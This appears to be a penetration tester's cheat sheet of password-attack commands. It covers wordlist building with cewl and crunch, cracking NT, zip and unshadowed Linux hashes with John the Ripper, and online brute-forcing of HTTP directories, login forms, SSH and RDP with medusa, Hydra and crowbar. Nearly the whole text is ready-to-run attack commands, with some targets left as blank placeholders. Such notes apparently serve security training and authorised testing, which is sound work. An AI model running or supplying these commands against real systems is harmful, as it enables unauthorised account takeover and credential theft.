Password Attacks

cewl - word list generator (builds a word list from a target website's content)

cewl -m 6 -w megacorp-cewl.txt # min 6 char words

john - John the Ripper

john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt # apply john's mangling rules to the cewl list and write the mutated list instead of cracking

Windows (NT) hashes:

john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT

zip cracking:

zip2john <> > zip.hashes
john zip.hashes

Linux hashes:

# first, the passwd and shadow files need to be combined (unshadowed)
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt 
# and then cracked
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

# for a specific user
john --user=root --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

crunch - brute-force password list generator

crunch 8 8 -t ,@@^^%%%

# @ - Lower case alpha characters
# , - Upper case alpha characters
# % - Numeric characters
# ^ - Special characters including space

crunch 4 6 0123456789ABCDEF -o crunch.txt # 4-6 character passwords made from combinations of the listed characters

medusa - brute-force password attacks against many network protocols (list available modules with medusa -d)

medusa -h <ip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
# attack on an htaccess-protected directory: user admin, directory (URL path) /admin

crowbar - brute-forcing with SSH keys and against RDP

# RDP attack with crowbar
crowbar -b rdp -s -u admin -C password-file.txt -n 1

THC-Hydra - multi-protocol attack tool

# ssh attack
hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://

# HTTP post attack
hydra http-form-post
"/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P
/usr/share/wordlists/rockyou.txt -vV -f # -vV: verbose output; -f: stop after the first successful login